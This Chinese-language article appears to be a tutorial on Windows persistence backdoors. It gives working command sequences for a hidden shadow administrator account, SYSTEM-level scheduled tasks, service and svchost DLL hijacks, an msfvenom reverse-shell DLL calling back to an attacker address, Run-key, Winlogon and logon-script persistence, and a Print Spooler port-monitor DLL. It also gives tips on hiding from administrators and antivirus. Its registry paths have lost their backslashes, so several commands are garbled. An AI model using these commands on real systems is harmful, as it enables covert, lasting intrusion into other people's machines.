對(duì)常見的系統(tǒng)后門技術(shù)及利用方式進(jìn)行詳細(xì)說明

0x00 前言

在獲取到目標(biāo)機(jī)器的權(quán)限后，如果想長時(shí)間的對(duì)目標(biāo)進(jìn)行控制，那么繞不開的一個(gè)操作就是權(quán)限持久化，為了實(shí)現(xiàn)這個(gè)目的，許許多多的后門技術(shù)應(yīng)運(yùn)而生。因此，本文對(duì)常見的系統(tǒng)后門技術(shù)進(jìn)行了總結(jié)并對(duì)其利用方式進(jìn)行了詳細(xì)的說明，希望可以對(duì)大家的學(xué)習(xí)提供一些幫助。

0x01 創(chuàng)建影子賬戶

影子賬戶其實(shí)就是隱藏賬戶，無論通過 “計(jì)算機(jī)管理” 還是命令行查詢都無法看到，只能在注冊(cè)表中找到其信息。

hacker 常常通過創(chuàng)建具有管理員權(quán)限的影子賬戶，在目標(biāo)主機(jī)上實(shí)現(xiàn)權(quán)限維持

注意需要擁有管理員級(jí)別的權(quán)限

下面來實(shí)操如何創(chuàng)建影子賬戶：

① 在目標(biāo)機(jī)創(chuàng)建一個(gè)名為 “Hack” 的賬戶

net user Hack$ 123Abc!@# /add 
# “$” 符號(hào)表示該用戶為隱藏賬戶，無法通過命令行查詢到，但是通過計(jì)算機(jī)管理的 “本地用戶和組” 可以看到隱藏用戶

此時(shí)，Hack$ 還是標(biāo)準(zhǔn)用戶，為了使其擁有管理員級(jí)別的權(quán)限，還需要修改注冊(cè)表。

② 在注冊(cè)表中找到 HKEY_LOCAL_MACHINESAMSAM，單擊右鍵，在彈出的菜單中選擇 “權(quán)限” 選項(xiàng)，將 Administrator 用戶的權(quán)限設(shè)置為 “完全控制”。

該注冊(cè)表項(xiàng)的內(nèi)容在標(biāo)準(zhǔn)用戶和管理員權(quán)限下都是不可見的

③ 在注冊(cè)表項(xiàng) HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames 處選擇 Administrator 用戶，在左側(cè)找到與右邊顯示的鍵值的類型 “0x1f4” 相同的目錄名。

復(fù)制 000001F4 表項(xiàng)的 F 屬性的值。

④ 在找到與隱藏賬戶 Hack$ 相應(yīng)的目錄 “000003EB”，將復(fù)制的 000001F4 表項(xiàng)中的 F 屬性值粘貼到 000003EB 表項(xiàng)中的 F 屬性值處，并確認(rèn)。

到此處，Hack$ 用戶劫持了 Administrator 用戶的 RID，從而使 Hack$ 用戶獲得 Administrator 用戶的權(quán)限。

⑤ 分別選中注冊(cè)表項(xiàng) “Hack$” 和 “000003EB” 并導(dǎo)出，然后執(zhí)行以下命令，刪除 Hack$ 用戶：

net user Hack$ /del

⑥ 將剛才導(dǎo)出的兩個(gè)注冊(cè)表項(xiàng)導(dǎo)入注冊(cè)表。

到此，影子賬戶 Hack$ 就創(chuàng)建好了。此時(shí)查看 “本地用戶和組” 也看不到該賬戶，只在注冊(cè)表中才能看到。

嘗試使用影子賬戶登錄遠(yuǎn)程桌面

0x02 計(jì)劃任務(wù)后門

通過創(chuàng)建計(jì)劃任務(wù)，讓目標(biāo)主機(jī)在特定的時(shí)間點(diǎn)或規(guī)定的周期內(nèi)重復(fù)運(yùn)行 hacker 預(yù)先準(zhǔn)備的后門程序，從而實(shí)現(xiàn)權(quán)限持久化。

執(zhí)行以下命令，在目標(biāo)主機(jī)上創(chuàng)建一個(gè)名為 Backdoor 的計(jì)劃任務(wù)，每 60 秒以 SYSTEM 權(quán)限運(yùn)行一次后門程序 shell.exe。

schtasks /Create /TN Backdoor /SC minute /MO 1 /TR C:WindowsSystem32shell.exe /RU System /F
# /TN，指定要?jiǎng)?chuàng)建的計(jì)劃任務(wù)的名稱
# /SC，指定計(jì)劃任務(wù)執(zhí)行頻率
# /MO，指定計(jì)劃任務(wù)執(zhí)行周期
# /TR，指定計(jì)劃任務(wù)運(yùn)行的程序路徑
# /RU，指定計(jì)劃任務(wù)運(yùn)行的用戶權(quán)限
# /F，如果指定的任務(wù)已經(jīng)存在，則強(qiáng)制創(chuàng)建

注意：如果以 SYSTEM 權(quán)限運(yùn)行計(jì)劃任務(wù)，就需要擁有管理員級(jí)別的權(quán)限。

當(dāng)計(jì)劃任務(wù)觸發(fā)后，目標(biāo)主機(jī)就會(huì)上線

計(jì)算機(jī)上所有的計(jì)劃任務(wù)都存儲(chǔ)在了 “計(jì)算機(jī)管理” 中的 “計(jì)劃任務(wù)程序庫”。

可以看到，計(jì)劃任務(wù)在 “計(jì)劃任務(wù)程序庫” 中以類似文件目錄的形式存儲(chǔ)，所有計(jì)劃任務(wù)都存儲(chǔ)在最內(nèi)層的目錄中。因此，為了增強(qiáng)隱蔽性，建議在創(chuàng)建計(jì)劃任務(wù)后門時(shí)遵守這個(gè)存儲(chǔ)規(guī)范。

執(zhí)行以下命令，在 MicrosoftWindowsAppTask 路徑下創(chuàng)建一個(gè)名為 “AppRun” 的計(jì)劃任務(wù)后門。

schtasks /Create /TN MicrosoftWindowsAppTaskAppRun /SC daily /ST 08:00 /MO 1 /TR C:WindowsSystem32shell.exe /RU System /F

0x03 系統(tǒng)服務(wù)后門

對(duì)于啟動(dòng)類型為 “自動(dòng)” 的系統(tǒng)服務(wù)，hacker 可以將服務(wù)運(yùn)行的二進(jìn)制文件路徑設(shè)置為后門程序或其他攻擊載荷，當(dāng)系統(tǒng)或服務(wù)重啟時(shí)，可以重新獲取對(duì)目標(biāo)主機(jī)的控制權(quán)。但是，前提條件是已經(jīng)獲取了目標(biāo)主機(jī)的管理員權(quán)限。

1. 創(chuàng)建系統(tǒng)服務(wù)

執(zhí)行以下命令，在目標(biāo)主機(jī)上創(chuàng)建一個(gè)名為 Backdoor 的系統(tǒng)服務(wù)，啟動(dòng)類型為 “自動(dòng)”，啟動(dòng)權(quán)限為SYSTEM：

sc create Backdoor binpath= "cmd.exe /k C:WindowsSystem32shell.exe" start= "auto" obj= "LocalSystem" 
# binpath，指定服務(wù)的二進(jìn)制文件路徑，注意 “=” 后必須有一個(gè)空格 
# start，指定啟動(dòng)類型 
# obj，指定服務(wù)運(yùn)行的權(quán)限

系統(tǒng)或服務(wù)重啟時(shí)，將以 SYSTEM 權(quán)限運(yùn)行后門程序 shell.exe，目標(biāo)主機(jī)就會(huì)上線。

2. 利用現(xiàn)有的系統(tǒng)服務(wù)

通過修改現(xiàn)有服務(wù)的配置信息，使服務(wù)啟動(dòng)時(shí)運(yùn)行指定的后門程序。

hacker 可以通過 “sc config” 命令修改服務(wù)的 binpath 選項(xiàng)，也可以嘗試修改服務(wù)注冊(cè)表的 ImagePath 鍵，二者都直接指定了相應(yīng)服務(wù)的啟動(dòng)時(shí)運(yùn)行的二進(jìn)制文件。

① 執(zhí)行以下命令，將該服務(wù)注冊(cè)表中的 ImagePath 鍵指向預(yù)先上傳的攻擊載荷。

reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRegSvc /v ImagePath /t REG_EXPAND_SZ /d "cmd.exe /k C:UsersPublicshell.exe" /f

② 系統(tǒng)或服務(wù)重啟時(shí)，將以 SYSTEM 權(quán)限運(yùn)行后門程序 shell.exe，目標(biāo)主機(jī)就會(huì)上線。

3. 利用 svchost.exe 啟動(dòng)服務(wù)

svchost.exe 是 Windows 的系統(tǒng)文件，svchost.exe 是從動(dòng)態(tài)鏈接庫（DLL）中運(yùn)行的服務(wù)的通用主機(jī)進(jìn)程名稱。該程序本身只是作為服務(wù)的宿主，許多系統(tǒng)服務(wù)通過注入該程序進(jìn)程中啟動(dòng)，所以系統(tǒng)中會(huì)存在多個(gè)該程序的進(jìn)程。

在 Windows 系統(tǒng)中，需要由 svchost.exe 進(jìn)程啟動(dòng)的服務(wù)將以 DLL 形式實(shí)現(xiàn)。在安裝這些服務(wù)時(shí)，需要將服務(wù)的可執(zhí)行文件路徑指向 svchost.exe。在啟動(dòng)這些服務(wù)時(shí)，由 svchost.exe 調(diào)用相應(yīng)服務(wù)的 DLL 文件，而具體調(diào)用哪個(gè) DLL 是由該服務(wù)在注冊(cè)表的信息所決定的。

下面以 wuauserv 服務(wù)（Windows Update）為例進(jìn)行講解：

在注冊(cè)表中定位到 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetserviceswuauserv。從 imagepath 鍵值可以得知，該服務(wù)啟動(dòng)的可執(zhí)行文件的路徑為 C:Windowssystem32svchost.exe -k netsvcs，說明該服務(wù)是依靠 svchost.exe 加載 DLL 文件來實(shí)現(xiàn)的。

wuauserv 服務(wù)的注冊(cè)表下還有一個(gè) Parameters 子項(xiàng)，其中的 ServiceDll 鍵值表明該服務(wù)由哪個(gè) DLL 文件負(fù)責(zé)。當(dāng)服務(wù)啟動(dòng)時(shí)，svchost.exe 就會(huì)加載 wuaueng.dll 文件，并執(zhí)行其提供的具體服務(wù)。

注意：系統(tǒng)會(huì)根據(jù)服務(wù)可執(zhí)行文件路徑中的參數(shù)對(duì)服務(wù)進(jìn)行分組，如 C:Windowssystem32svchost.exe -k netsvcs 表明該服務(wù)屬于 netsvcs 這個(gè)服務(wù)組。通常，每個(gè) svchost 進(jìn)程負(fù)責(zé)運(yùn)行一組服務(wù)。因此，并不是每啟動(dòng)一個(gè)服務(wù)就會(huì)增加一個(gè) svchost.exe 進(jìn)程。

svchost.exe 的所有服務(wù)分組位于注冊(cè)表的 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost 中。通過 svchost.exe 加載啟動(dòng)的服務(wù)都要在該表項(xiàng)中注冊(cè)。

實(shí)戰(zhàn)中，hacker 可以通過 svchost.exe 加載惡意服務(wù)，以此來建立持久化后門。由于惡意服務(wù)的 DLL 將加載到 svchost.exe 進(jìn)程，惡意進(jìn)程不是獨(dú)立運(yùn)行的，因此具有很高的隱蔽性。

接下來進(jìn)行實(shí)操：

① 使用 msf 生成一個(gè)負(fù)責(zé)提供惡意服務(wù)的 DLL 文件，然后將生成的 DLL 上傳到目標(biāo)主機(jī)的 System32 目錄。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.220.132 lport=6666 -f dll > reverse_tcp.dll

② 創(chuàng)建名為 Backdoor 的服務(wù)，并以 svchost 加載的方式啟動(dòng)，服務(wù)分組為 netsvc

sc create Backdoor binpath= "C:Windowssystem32svchost.exe -k netsvc" start= "auto" obj= "LocalSystem"

③ 將 Backdoor 服務(wù)啟動(dòng)時(shí)加載的 DLL 設(shè)為 reverse_tcp.dll

reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesBackdoorParameters /v ServiceDll /t REG_EXPAND_SZ /d "C:WindowsSystem32
everse_tcp.dll"

④ 配置服務(wù)描述

reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesBackdoor /v Description /t REG_SZ /d "Windows Service"

⑤ 配置服務(wù)顯示名稱

reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesBackdoor /v DisplayName /t REG_SZ /d "Backdoor"

⑥ 創(chuàng)建服務(wù)新分組 netsvc，并將 Backdoor 服務(wù)添加進(jìn)去

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost" /v netsvc /t REG_MULTI_SZ /d Backdoor

⑦ 當(dāng)系統(tǒng)重啟時(shí)，Svchost 以 SYSTEM 權(quán)限加載惡意服務(wù)，目標(biāo)主機(jī)就會(huì)上線。

0x04 啟動(dòng)項(xiàng)/注冊(cè)表鍵后門

hacker 可以通過將后門程序添加到系統(tǒng)啟動(dòng)文件夾或通過注冊(cè)表運(yùn)行鍵引用來進(jìn)行權(quán)限持久化。添加的后門程序?qū)⒃谟脩舻卿浀纳舷挛闹袉?dòng)，并且將具有與賬戶相關(guān)聯(lián)的權(quán)限等級(jí)。

1. 系統(tǒng)啟動(dòng)文件夾

將程序放置在啟動(dòng)文件夾中會(huì)導(dǎo)致該程序在用戶登錄時(shí)執(zhí)行。

Windows 系統(tǒng)有兩種常見的啟動(dòng)文件夾：

# 位于以下目錄中的程序?qū)⒃谥付ㄓ脩舻卿洉r(shí)啟動(dòng)
 C:Users[Username]AppDataRoamingMicrosoftWindowsStart
 C:Users[Username]AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup
 
 # 位于以下目錄中的程序?qū)⒃谒杏脩舻卿洉r(shí)啟動(dòng)
 C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup

嘗試將后門程序放入 hack 用戶的啟動(dòng)文件夾

切換用戶登錄，成功上線

2. 運(yùn)行鍵（Run Keys）

Windows 系統(tǒng)上有許多注冊(cè)表項(xiàng)可以用來設(shè)置在系統(tǒng)啟動(dòng)或用戶登錄時(shí)運(yùn)行指定的程序或加載指定 DLL 文件，hacker 可以對(duì)此類注冊(cè)表進(jìn)行濫用，以建立持久化后門。

當(dāng)用戶登錄時(shí)，系統(tǒng)會(huì)依次檢查位于注冊(cè)表運(yùn)行鍵（Run Keys）中的程序，并在用戶登錄的上下文中啟動(dòng)。Windows 系統(tǒng)默認(rèn)創(chuàng)建以下運(yùn)行鍵，如果修改 HKEY_LOCAL_MACHINE 下的運(yùn)行鍵，需要擁有管理員級(jí)別的權(quán)限。

# 以下注冊(cè)表項(xiàng)中的程序?qū)⒃诋?dāng)前用戶登錄時(shí)啟動(dòng)
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce

# 以下注冊(cè)表中的程序?qū)⒃谒杏脩舻卿洉r(shí)啟動(dòng)
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce
HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionRun
HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionRunOnce

執(zhí)行以下命令，在注冊(cè)表運(yùn)行鍵中添加一個(gè)名為 “Backdoor” 的鍵，并將鍵值指向后門程序的絕對(duì)路徑。

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v Backdoor /t REG_SZ /d "C:WindowsSystem32shell.exe"

當(dāng)用戶重新登錄時(shí)，目標(biāo)主機(jī)就會(huì)上線。

3. Winlogon Helper

Winlogon 是 Windows 系統(tǒng)的組件，用于處理與用戶有關(guān)的各種行為，如登錄、注銷、在登錄時(shí)加載用戶配置文件、鎖定屏幕等。這些行為由系統(tǒng)注冊(cè)表管理，注冊(cè)表中的一些鍵值定義了在 Windows 登錄期間會(huì)啟動(dòng)哪些進(jìn)程。

hacker 可以濫用此類注冊(cè)表鍵值，使 Winlogon 在用戶登錄時(shí)執(zhí)行惡意程序，以此建立持久化后門。

常見的有以下兩個(gè)：

# 指定用戶登錄時(shí)執(zhí)行的用戶初始化程序，默認(rèn)為 userinit.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit

# 指定 Windows 身份驗(yàn)證期間執(zhí)行的程序，默認(rèn)為 explorer.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonshell

執(zhí)行以下命令，在 Userinit 鍵值中添加一個(gè)后門程序。

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Userinit /d "C:Windowssystem32userinit.exe,shell.exe" /f

當(dāng)用戶重新登錄時(shí)，目標(biāo)主機(jī)就會(huì)上線。

注意：在濫用 Userinit 和 Shell 鍵時(shí)需要保留鍵值中的原有程序，將待啟動(dòng)的后門程序添加到原有程序后面，并以 “,” 進(jìn)行分隔。并且，后面程序需要被上傳至 C:Windowssystem32 目錄。

4. Logon Scripts

Logon Scripts是優(yōu)先于很多殺毒軟件啟動(dòng)的，所以可以通過這種方式繞過殺毒軟件敏感操作攔截。

執(zhí)行以下命令，在 HKEY_CURRENT_USER/Enviroment 下新建字符串鍵值 UserInitMprLogonScript，鍵值設(shè)置為想要執(zhí)行的程序或bat腳本的路徑：

reg add "HKEY_CURRENT_USEREnvironment" /v UserInitMprLogonScript /t REG_SZ /d "C:Windowssystem32shell.exe"

重啟系統(tǒng)或重新登陸賬戶，成功上線

0x05 Port Monitors后門

打印后臺(tái)處理服務(wù)（Print Spooler）負(fù)責(zé)管理 Windows 系統(tǒng)的打印作業(yè)。與該服務(wù)的交互是通過 Print Spooler API 執(zhí)行的，其中包含 AddMonitor 函數(shù)，用于安裝 Port Monitors（本地端口監(jiān)聽器），并連接配置、數(shù)據(jù)和監(jiān)視器文件。AddMonitor 函數(shù)能夠?qū)?DLL 注入 spoolsv.exe 進(jìn)程，以實(shí)現(xiàn)相應(yīng)功能，并且通過創(chuàng)建注冊(cè)表鍵，hacker 可以在目標(biāo)系統(tǒng)上進(jìn)行權(quán)限持久化。

注意：利用該技術(shù)需要擁有管理員級(jí)別的權(quán)限。

① 通過 msf 生成一個(gè) 64 位的惡意 DLL

② 將生成的 DLL 上傳到目標(biāo)主機(jī)的 C:Windowssystem32 目錄中，執(zhí)行一下命令，通過編輯注冊(cè)表安裝一個(gè)端口監(jiān)視器。

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlPrintMonitorsTestMonitor" /v "Driver" /t REG_SZ /d "reverse_tcp.dll"

當(dāng)系統(tǒng)重啟時(shí)，Print Spooler 服務(wù)在啟動(dòng)過程中會(huì)讀取 Monitors 注冊(cè)表項(xiàng)的所有子健，并以 SYSTEM 權(quán)限加載 Driver 鍵值所指定的 DLL 文件。

0x06 總結(jié)

在本文的很多例子中，其實(shí)都會(huì)或多或少與一個(gè)東西有關(guān)，那就是注冊(cè)表。關(guān)于注冊(cè)表，我覺得值得花時(shí)間去仔細(xì)研究一番，一定會(huì)有很大的收獲。

關(guān)于系統(tǒng)后門技術(shù)其實(shí)還有許許多多，本文只是將常見的一些技術(shù)拿出來進(jìn)行了分享，希望可以對(duì)大家的學(xué)習(xí)有幫助。如有不對(duì)，歡迎指正。

審核編輯：劉清